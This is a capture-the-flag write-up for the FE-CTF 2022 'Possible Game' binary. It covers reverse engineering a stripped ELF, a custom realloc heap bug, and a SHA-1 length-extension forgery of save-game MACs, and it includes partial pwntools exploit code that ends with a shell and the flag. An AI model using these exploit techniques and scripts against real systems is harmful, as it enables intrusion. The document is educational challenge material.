FE-CTF 2022: Cyber Demon – Possible Game

WriteUp 1年前 (2022) admin
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FE-CTF 2022: Cyber Demon

Challenge: Possible Game

For this challenge we’ve been given a binary (game) and an address (possible.ctf:1337). The file is a statically linked and stripped ELF, just like in the good old days (except this one is 64 bit).

Organizer’s note:

This challenge was designed to be the “rockstar killer”, which is half of the reason it was statically linked and stripped, because that has the potential to eat a lot of time. The other half of the reason is that the binary uses a custom malloc(), and we wouldn’t like that fact to be immediately obvious.

The binary was compiled with dietlibc to make the reverse engineering task less daunting (~50K vs ~950K with gcc and glibc). You be the judge of wether that actually helped.

Local setup

Running the binary we see:

$ ./game
open: No such file or directory

Running it with strace we can see that the binary needs a file called secret_key:

$ strace ./game
execve("./game", ["./game"], 0x7ffde7363300 /* 37 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7ffdf137a280) = 0
brk(NULL)                               = 0xede000
brk(0xedf000)                           = 0xedf000
open("/dev/urandom", O_RDONLY)          = 3
open("secret_key", O_RDONLY)            = -1 ENOENT (No such file or directory)
write(2, "open", 4open)                     = 4
write(2, ": ", 2: )                       = 2
write(2, "No such file or directory", 25No such file or directory) = 25
write(2, "\n", 1
)                       = 1
exit(1)                                 = ?
+++ exited with 1 +++

Create the file:

$ echo much secret > secret_key

And now the game runs:

FE-CTF 2022: Cyber Demon - Possible Game

This looks like a kind of edge-matching puzzle. It’s not clear what we would get for solving the game, so let’s reverse it instead.

Reverse engineering

Organizer’s note:

If you had no trouble reverse engineering the binary (or had trouble, but did it anyway) you can skip to “Functional overview” now.

Loading the binary up in our favorite disassembler we see that the first point on the agenda will be finding main. The _start function (well, entrypoint of the ELF, since it doesn’t have symbols, but you get the point) looks different to what you might be used to (gcc or clang):

pop     rdi
mov     rsi, rsp
push    rdi
lea     rdx, [rsi+rdi*8+8]
mov     cs:qword_40D340, rdx
call    sub_4060AA
mov     rdi, rax
call    sub_408AA1

At this point some will recognize dietlibc.

First, we immediately see that envp (which follows argv when the kernel passes control) is stored at 0x40d340. The first Hard Problem of Computer Science is “naming things”, and this is a freebie, so we might as well rename that location right away.

Usually libc does some final steps (e.g. calls functions registered with atexit as required by POSIX) before exiting, so main is probably going to be either at 0x4060aa or called from there.

The second function, at 0x408aa1, will probably call exit as some point (otherwise we would hit hlt, which would result in a SIGSEGVbeing delivered), so let’s have a look at that, so we can start to populate our symbol table.

FE-CTF 2022: Cyber Demon - Possible Game

(Organizer’s note: I’m lazy, so today IDA is my favorite disassembler.)

Here we see that 0x40e3a0 looks to be the number of functions registerred with atexit, and 0x40e8b8 is one word below the list of those functions (since rbx never becomes 0 when calling into that list). So let’s rename those locations to something like atexit_num_funcs and atexit_list_minus_8. Also give 0x40e8c0 the name atexit_list (this will become important later).

Finally the function at 0x405d70 is called:

FE-CTF 2022: Cyber Demon - Possible Game

Syscall 0x3c = 60 is SYS_EXIT on AMD64, so we name the function _exit, and the prior exit.

OK, back to 0x4060aa. It’s too big to list here, but it does not look like your typical main function. Rather, it looks like some sort of initializer as it references the strings "/dev/urandom", "LD_PRELOAD" and "valgrind". If it calls main (and it must), then that will probably happen last. The last call in this function is to 0x405cb7, which is given three arguments, that fits with the prototype for main: int main(int argc, char *argv[], char *envp[]).

Looking at main:

int __cdecl main(int argc, const char **argv, const char **envp) {
  sub_4068DD(off_40D0C0, 0LL, 0LL, 1024LL);
  sub_4068DD(off_40D140, 0LL, 0LL, 1024LL);
  sub_4068DD(off_40D040, 0LL, 0LL, 1024LL);
  dword_40D220 = sub_405D9B("/dev/urandom", 0LL);
  if ( dword_40D220 == -1 )
    sub_405EBC("open", 0LL);
    result = 1;
    sub_404D8C("/dev/urandom", 0LL);
    result = 0;
  return result;

Looking at cross references to 0x40d0c0, 0x40d140 and 0x40d040 it is not too difficult to guess that those are FILE *stdin, *stdout, *stderr, respectively. And then the first three lines look an awful lot like

setvbuf(stdin, NULL, 0, _IONBF, BUFSIZ);
setvbuf(stdout, NULL, 0, _IONBF, BUFSIZ);
setvbuf(stderr, NULL, 0, _IONBF, BUFSIZ);

Which, according to C89, is equivalent to

setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);

Looking at the function call in the body of the first if, we see something like this (after choosing sensible types and variable names):

void __cdecl perror(const char *s)
  const char *s_beg;
  char *errstr;
  __int64 errno;
  signed __int64 s_len_ish;
  bool c;
  char *errstr_beg;
  signed __int64 errstr_len_ish;

  s_beg = s;
  errstr = "[unknown error]";
  errno = *MK_FP(__FS__, -4LL);
  if ( (unsigned int)errno <= 0x81 )
    errstr = strerror_list[errno];
  if ( s )
    s_len_ish = -1LL;
      if ( !s_len_ish )
      c = *s++ == 0;
    while ( !c );
    write(STDERR_FILENO, s_beg, ~s_len_ish - 1);
    write(STDERR_FILENO, ": ", 2uLL);
  errstr_beg = errstr;
  errstr_len_ish = -1LL;
    if ( !errstr_len_ish )
    c = *errstr_beg++ == 0;
  while ( !c );
  write(STDERR_FILENO, errstr, ~errstr_len_ish - 1);
  write(STDERR_FILENO, "\n", 1uLL);

Notice that we renamed address 0x405da9 to write. It looks like the following:

0x405d70: mov     al, 0x3c
0x405d72: mov     ah, 0     <-----.
[...]                             |
<write>:                          |
0x405da9: mov     al, 1           |
0x405dab: jmp     loc_405D72  ----'

So it’s a jump into the middle of _exit, which just skips setting al. This is just clever dietlibc magic; don’t be scared. Setting al to 1 (SYS_WRITE) is what makes this function write. We can even rename address 0x405d72 to syscall_0_255, since this technique is probably going to be used other places as well.

Now that we know that perror("open") is called if the previous function call returned -1, it seems safe to guess that that function is really open, which is also easily confirmed from the disassembly (SYS_OPEN = 2):

0x405d9b: mov     al, 2
0x405d9b: jmp     0x405d72 <syscall_0_255>

Continuing with the else branch we have two function calls, neither of which seem to take any arguments. The first function is at 0x404d8c:

void __cdecl sub_404D8C(){
  int fd;
  int ret;

  fd = open("secret_key", 0);
  if ( fd == -1 )
  ret = sub_405DA2((unsigned int)fd, byte_40D240, 256LL);
  if ( ret == -1 )
  while ( byte_40D240[ret - 1] == 10 )
  byte_40D240[ret] = 0;

Once again we get a strong hint from the perror call, so we rename the function at 0x405da2 to read. The function reads up to 256 characters from the file secret_key into a global buffer and NUL-terminates it at the first \n. We rename the global buffer to secret_key, and the function to read_secret_key.

The second function may give your disassembler some trouble since it uses a jump table. After convincing IDA that the function really ends at the ret function we see something like this:

FE-CTF 2022: Cyber Demon - Possible Game

The function inside the loop takes 5 as its first argument followed by 5 strings, which suggests that it is a varargs function. The returned value is incremented by one and checked to be less than or equal to 6, which suggests that the function can return values in the range -1 to 5, inclusive, and that the compiler just increments this to allow it to use a jump table.

Digging into the function, which we’ll call show_menu, it is not too hard to confirm these assumptions, and also see that the function returns -1 (EOF) if stdin is closed. Otherwise, the number (1-indexed) of the option chosen by the user.

We also get (guess) a few more symbols for our table:

0x406796: printf
0x4064f3: fgets
0x405db0: atoi
0x40686b: puts

Going back, we name the calling function main_menu. The jump via the jump table works like this:

0x405c03: call    show_menu
0x405c08: add     eax, 1
0x405c0b: cmp     eax, 6
0x405c0e: ja      short loc_405bd6 ; loop back and show menu again
0x405c10: mov     eax, eax
0x405c12: lea     rdx, ds:0[rax*4]
0x405c1a: lea     rax, main_menu_jump_table
0x405c21: mov     eax, [rdx+rax]
0x405c24: cdqe
0x405c26: lea     rdx, main_menu_jump_table
0x405c2d: add     rax, rdx
0x405c30: jmp     rax

So the entries in the jump table are addresses relative to the jump table itself, which sits at address 0x409450.

The first option is "New game", which corresponds to the second entry in the jump table: 0xffffc7e2 = -14366. Relative to the jump table that is address: 0x409450 – 14366 = 0x405c32, i.e. right after the jmp rax itself.

The other jump targets can be computed similarly and we get:

0x405c32: mov     eax, 0
0x405c37: call    sub_405a95
0x405c3c: jmp     short loc_405caf   ------.
<main_menu_load_game>:                     |
0x405c3e: mov     eax, 0                   |
0x405c43: call    sub_404e2c               |
0x405c48: test    al, al                   |
0x405c4a: jz      short loc_405cae -----.  |
0x405c4c: mov     eax, 0                |  |
0x405c51: call    sub_405880            |  |
0x405c56: jmp     short loc_405cae ----.|  |
<main_menu_cont_game>:                  |  |
0x405c58: mov     rax, cs:qword_40d228  |  |
0x405c5f: test    rax, rax              |  |
0x405c62: jz      short loc_405c70 --.  |  |
0x405c64: mov     eax, 0             |  |  |
0x405c69: call    sub_405880         |  |  |
0x405c6e: jmp     short loc_405caf --+--+-.|
0x405c70: lea     rdi, aNoGame  <----'  |  | "No game"
0x405c77: call    puts                  |  |
0x405c7c: jmp     short loc_405caf -----+-.|
<main_menu_hof>:                        |  |
0x405c7e: lea     rdi, aHallOfFame_0    |  | "[~~~~  HALL OF FAME ~~~~]"
0x405c85: call    puts                  |  |
0x405c8a: lea     rdi, aCatHall_of_fam  |  | "cat hall_of_fame.txt"
0x405c91: call    sub_406a0a            |  |
0x405c96: lea     rdi, asc_409436       |  | "[~~~~~~~~~~~~~~~~~~~~~~~]" |
0x405c9d: call    puts                  |  |
0x405ca2: jmp     short loc_405caf -----+-.|
<main_menu_quit>:                       |  |
0x405ca4: mov     edi, 0                |  |
0x405ca9: call    exit                  |  |
0x405cae: nop        <------------------'  |
0x405caf: jmp     loc_405bd6   <-----------'---> loop back and show menu again
0x405cb5: pop     rbp
0x405cb6: retn

Which immediately tells us that 0x405a95 is new_game, 0x404e2c is load_game, 0x405880 is continue_game and that a pointer to the current active game is stored at 0x40d228 (we’ll call it g_game). We can also guess that the function at 0x406a0a is system, which is always interesting.

In new_game we first see that if g_game is not NULL, a function is called, taking it as an argument. This is probably a function call to free or reset the current game, so we’ll just call it free_game? for now.

Then we see a call to the show_menu function we covered before with the options "Easy", "Medium" and "Hard". Oddly the values (which will turn out to be side lengths of the puzzle) are stored in global variables in RW memory at 0x40d010, 0x40d018 and 0x40d020respectively.

Maybe the goal is to overwrite one of these values in order to make the game easier?

Organizer’s note:

It is not. This challenge has a number of red herrings.

After a difficulty is chosen, the function at 0x403c32 is called with the difficulty’s number (which in an act of foresight, we’ll call size) as its only argument. The result is stored into g_game, so we’ll call this function create_game.

Looking into create_game we see that the function at 0x403afd is called with 2 * size * size as its only argument, and that the return value seems to be a buffer judging from the following code. This suggests that the function is malloc. At the end of create_game another function at 0x40119e is called with the two buffers as arguments, which are not returned from the function call.
A strong hint that this function is really free. The malloc/free hypothesis can of course also be tested dynamically by attaching a debugger and actually calling them.

It checks out.

Organizer’s note:

This malloc is actually a thin wrapper around the real malloc which in debug mode asserts that the returned pointer is not NULL, but here does nothing.

We’ll not go into reversing the game representation here; skip to “Functional overview” for that.

Turning our attention to continue_game we see an infinite loop which shows the current game state then a menu with options "Move", "Rotate", "Mirror", "Save game", "See score" and "Exit to main menu" (and another jump table), until the game is won (or exited):

FE-CTF 2022: Cyber Demon - Possible Game

We also see that winning the game on difficulty HARD calls the function here named enter_hall_of_fame:

FE-CTF 2022: Cyber Demon - Possible Game

What we see here, ladies and gentlemen, is an oldskool stack buffer overflow. Win the game on hard mode => instant pwnage (pronounced with a french accent).

Organizer’s note:

Red herring. If you can solve a HARD instance of the game, we’d love to hear about it; we didn’t even bother to try ourselves.

For reference here’s a HARD instance of the game:

FE-CTF 2022: Cyber Demon - Possible Game

This writeup is already getting quite long, so we’ll end the reversing part in a moment and trust that you can take it from here. But we’d like to point out one more thing before we continue; when loading a saved game (which is the game state serialized, MAC’ed and base64 encoded) the prompt "Enter saved game (end with a blank line):" is printed and then a function at 0x404cb7 which we’ll call readlines is called:

void *readlines() {
  size_t v0;
  int c;
  int sawnl;
  char *buf;
  size_t numb;
  size_t i;

  i = 0LL;
  numb = 0LL;
  buf = NULL;
  sawnl = 1;
  while ( 1 )
    while ( 1 )
      c = fgetc(stdin);
      if ( c != '\n' )
      if ( sawnl )
        goto LABEL_10;
      sawnl = 1;
    if ( c == EOF )
    sawnl = 0;
    if ( i == numb )
      numb += 256LL;
      buf = (char *)realloc(buf, numb);
    v0 = i++;
    buf[v0] = c;
  buf[i] = 0;
  return realloc(buf, i + 1);

Here we have a one-byte heap buffer overflow; if a non-zero multiple of 256 bytes is read, then the assignment after LABEL_10 will store a zero into the byte just after the buffer. The readlines function is only ever called from load_game.

Organizer’s note:

We think this is a red herring. The bug was found in play test, but an exploit against it looks to be at least as challenging as the intended solution if it’s even possible, so the bug was left in, but never fully explored.

Functional overview

As you’ve seen, the game presents a number of menus. They fit together roughly like this:

Main menu (main_menu @ 0x405bd2)

  • New game (new_game @ 0x405a95)
    • Easy (create_game(3) @ 0x403c32)
    • Medium (create_game(7))
    • Hard (create_game(13))
      • Shuffle game (shuffle_game(size * size * 10) @ 0x4042ba)
      • Negate number of moves, rotations and mirrorings used; these are decremented as the game progresses, thus “unshuffling” the game would result in a zero in each field.
      • Game menu (continue_game @ 0x405880)
  • Load game (load_game @ 0x404e2c)
    • Continue game (continue_game)
  • Continue game (continue_game if g_game != NULL)
  • Hall of Fame
    • system("cat hall_of_fame.txt") @ 0x406a0a
  • Quit (exit(0) @ 0x408aa1)

Game loop (continue_game @ 0x405880)

  • Show game (show_game @ 0x40447c)
  • Is game won? (is_game_won @ 0x40491c)
    • Enter Hall of Fame (enter_hall_of_fame @ 0x4056f3 if g_game->size is HARD)
  • Show menu
    • Move
      • Move from: (read_position(&x, &y) @ 0x4057df)
      • Move to: (read_position(&x2, &y2))
      • act_move(g_game, x, y, x2, y2) @ 0x403fd3
    • Rotate
      • Rotate: (read_position(&x, &y))
      • act_rotate(g_game, x, y) @ 0x40409c
    • Mirror
      • Mirror: (read_position(&x, &y))
      • act_mirror(g_game, x, y) @ 0x4041f5
    • Save game (save_game @ 0x4052da)
    • Exit to main menu

Game creation and internal representation

Internally a game state is stored in a number of malloc()‘ed buffers and represented like this:

FE-CTF 2022: Cyber Demon - Possible Game

The fields moves, rotations and mirrorings are the number of each action “left”; when a new game is created, we start with a random but won game and perform size * size * 10 random actions on it. Initially these fields hold the number of each action performed during shuffling. They are decremented on each user action. The score (which is completely irrelevant) is computed as


A won game is generated by first allocating buffers for the vertical/horizontal pairs of numbers/colors (which are chosen randomly), then copying those into the game state. Afterwards these buffers are freed, which will become important later:

FE-CTF 2022: Cyber Demon - Possible Game

Saving and loading games

A saved game is just a serialization of the internal state where both the color and number of a side of a game piece is packed into one byte, then MAC’ed and finally base64 encoded. Loading a game just reverses this process, and checks that the MAC is valid.

FE-CTF 2022: Cyber Demon - Possible Game

As some of you undoubtedly know this is not a good way to MAC. More on this in the “Exploit” section.


As mentioned, this binary uses a custom malloc. And it has a bug. The malloc used here is the same one as in “The C Programming Language”, 2nd edition by Kernighan and Ritchie (ISBN 0-13-110362-8), pp. 185.

The way it works is that every chunk has a size header, and free chunks has a pointer to the next free chunk. But K&R didn’t include realloc so we added that in. (Un)fortunately we introduced a bug in the process.

When realloc()‘ing a buffer which is followed by a free chunk we need to move that chunk’s header. But the header of a free chunk is two words large, so the order of operations matter (think memcpy vs memmove). The following figures should make the problem clear. Green is unallocated memory and blue is allocated memory.

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

Overwriting the size field with the next pointer (plus 8) will result in a practically infinite free chunk, which means that new allocations can collide with previous allocations.

Then the natural question to ask is “where is realloc called”. In this binary there are only two calls to realloc and they are both in readlines.


The readlines function increases its input buffer in increments of 256 bytes as it goes along, then as a final step resizes the buffer to exactly fit the read data. This means that an input of 240–247 bytes (remember the NUL-terminator) will trigger the realloc bug.

So our plan for heap corrution is:

  1. Allocate A, at least 256+16+1 bytes.
  2. Allocate B which we want to overwrite later.
  3. Free A.
  4. readlines() between 256−8−7−1 and 256−8−1 bytes to trigger the realloc bug.
  5. readlines() overflow into B.

Or in pictures:

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

But we have a problem:

$ ./game
  1. New game
  2. Load game
  3. Continue game
  4. Hall of Fame
  5. Quit
> 2
Enter saved game (end with a blank line):

MAC error

Side quest: Hash extention attack

As mentioned earlier the way this binary computes the MAC for saved games is problematic. The reason is that if SHA-1(data) and len(data) is known one can construct ext such that SHA-1(data || ext) can be computed even though data is unknown.

This figure shows, in broad strokes, how SHA-1 (and other hashing algorithms) works:

FE-CTF 2022: Cyber Demon - Possible Game

The F in the figure is a “compression function”. Exactly how it works is not relevant for this attack. The brownish block at the end is a padding block which brings the input data up to a whole multiple of blocks. The final field is the length of the input data, in bits, encoded as a 64-bit big endian integer. The green/red arrows show data known/unknown to us, respectively.

Now if we replicate the padding in our ext, everything from here on out is known to us:

FE-CTF 2022: Cyber Demon - Possible Game

In our setting we have MAC = SHA-1(secret || game) so data = secret || game, which means that len(data) is not known. However, we know from reversing that len(secret) is at most 255 bytes, so the actual length can be found by trial and error.

We have a plan!

Now that we’ve build an arsenal of primitives we can put down a plan of attack. It goes like this:

  1. Obtain a game with a valid MAC.
  2. Find length of secret key by trial and error.
  3. Prepare the heap for exploitation.
  4. Trigger the realloc bug.
  5. Use a hash extension attack to overflow a heap buffer.
  6. PROFIT!

Step 1

This step is very easy; we just start a new game and save it. Done.

Step 2

If we append any data to a saved game it will load just fine as long as the MAC checks out. So we just try appending fake padding until we find the length of secret_key. There are a number of extension attack implementations available online, e.g. hashpumpy.

In the following, hashpump is a function that takes old_hash (hex encoded), old_data, extra and len_key such that len(key) = len_key and SHA-1(key || old_data) = old_hash, and returns new_hash (also hex encoded) and new_data such that SHA-1(key || new_data) = new_hash and new_data starts with old_data and ends with extra:

from hashpumpy import hashpump
from pwn import *

def mksock():
    return remote('possible.ctf', 1337)

# Obtain saved game
sock = mksock()
sock.sendline(b'1') # new game
sock.sendline(b'1') # easy
sock.sendline(b'4') # save game
sock.recvuntil(b'safe place:\n')
# Base 64 is split over two lines
save = sock.recvline().strip()
save += sock.recvline().strip()

# Extend saved game
def extend(extra):
    old_save = b64d(save)
    old_hash, old_data = old_save[:20], old_save[20:]
    new_hash_hex, new_data = hashpump(old_hash.hex(), old_data, extra, len_key)
    new_hash = bytes.fromhex(new_hash_hex)
    new_save = new_hash + new_data
    return b64e(new_save).encode()

# Load a saved game
def load(extra):
    sock.sendline(b'2') # load game
    sock.recvuntil(b'Enter saved game')
    sock.sendline(b'') # send blank line to end
    sock.sendline(b'n') # don't end current game

# Find secret key length
len_key = 0
with log.progress('Finding key length') as p:
    while True:
        with context.silent:
            sock = mksock()
            load(b'\0') # hashpumpy will not accept extra=b''
            line = sock.recvline()
        if b'MAC error' not in line:
        len_key += 1

For determining the key length the extra parameter is not relevant, but hashpumpy will not work without it, so we just add a NUL-byte. Besides, we need to add other data later on.


$ python3 doit.py
[+] Finding key length: 64

Step 3

A we saw earlier we need an allocation A of at least 256+16+1 bytes followed by an allocation B which we want to overwrite later. Then A needs to be freed, to have enough space to trigger the realloc bug through readlines.

We already saw how create_game first allocates two buffers for the vertical/horizontal pairs of colors/numbers, then frees them later after they have been copied into the game data. Choosing a HARD instance of the game maximizes the free space before the game data:

FE-CTF 2022: Cyber Demon - Possible Game

Step 4

We can use the hash extension attack to append data to a saved game such that we trigger the realloc bug in readlines and pass the MAC check. However it’s important that this step doesn’t ruin the heap layout obtained in step 3. Luckily the game will ask if we really want to load a new game if a game is already ongoing. Of course we don’t.

To trigger the bug we need to send between 240 and 247 bytes (again, remember the NUL-terminator). As it turns out 178 bytes base 64 encodes into exactly 240 bytes.

In pictures:

FE-CTF 2022: Cyber Demon - Possible Game

FE-CTF 2022: Cyber Demon - Possible Game

Step 5

We’re ready to overflow some game data!

This will be our strategy:

FE-CTF 2022: Cyber Demon - Possible Game

Now we just need to figure out some offsets, easy stuff^W^Wdeep breaths.

SHA-1 blocks are 64 bytes and the fake padding is at least 9 bytes, so


Allocations come in 8 byte increments, so the size of the buffer allocated in readlines is


Base 64 packs 6 bits per byte with an overhead of up to 2 bytes, so


The whole thing (including the second size field) adds up to


Everything up to the extension should add up to the largest value less than 704, so


This size will make the extension start right before or at the game data. Just pad with garbage (zeros will be fine) to get the right size.

The game data’s offset into the extension is given by


Or in Python (extending on the previous script):

# Calculate lengths and game data offset in extension
len_prefix = 20 + align(64, len(b64d(save)) - 20 + len_key + 9) - len_key
len_ext = int(514 - 1.75 * len_prefix)
len_b64 = (len_prefix + len_ext + 2) * 4 // 3
len_all = align(8, len_b64 + 1) + 8 + len_prefix
off_ext = 704 - len_all

info(f'|key|       = {len_key}')
info(f'|prefix|    = {len_prefix}')
info(f'|ext|       = {len_ext}')
info(f'|base64|    = {len_b64}')
info(f'|all|-|ext| = {len_all}')
info(f'game offset = {off_ext}')

Step 6

This is were our plan starts being a bit vague (“…”). If we can, somehow, obtain a heap pointer we will be able to construct an arbitrary “game”.

One way to leak a pointer is through the game tiles, but recall the internal game representation: we would need to overflow the rowspointer with a pointer to a “row” that has a pointer to a “game tile” which is really a heap pointer.

Here the internal representation again for reference:

FE-CTF 2022: Cyber Demon - Possible Game

Maybe surprisingly, we actually have such a pointer.

Recall that the heap allocator has a global pointer (freelist) which points at the first free chunk in the heap. The first word of a chunk is a size field, but in triggering the realloc bug we overwrote this field with a pointer to the next free chunk. The size field has been changed since, but only by a fixed amount.

FE-CTF 2022: Cyber Demon - Possible Game

After overwriting rows we can then show the game and parse this “somewhere” pointer out of the displayed game.

Step 7 (PROFIT!)

Once we can construct arbitrary games it is easy to obtain a write-what-where gadget. Each tile in a game is represented as 8 bytes, so swapping two tiles would allow us to write a machine word at an arbitrary address:

FE-CTF 2022: Cyber Demon - Possible Game

But what should we overwrite? Remember that atexit_list we found way back in the reversing step? That’s a juicy target. And we also found system, so we have a one-gadget in there somewhere.

See doit.py for the details.


$ python3 doit.py
[+] Opening connection to localhost on port 1337: Done
[*] Closed connection to localhost port 1337
[+] Finding key length: Done
[*] Found len(key) = 64
[*] |key|       = 64
[*] |prefix|    = 84
[*] |ext|       = 367
[*] |base64|    = 604
[*] |all|-|ext| = 700
[*] game offset = 4
[+] Opening connection to localhost on port 1337: Done
[*] Switching to interactive mode
$ cat flag
flag{no realloc, no problem!}


版权声明:admin 发表于 2022年12月2日 下午7:02。
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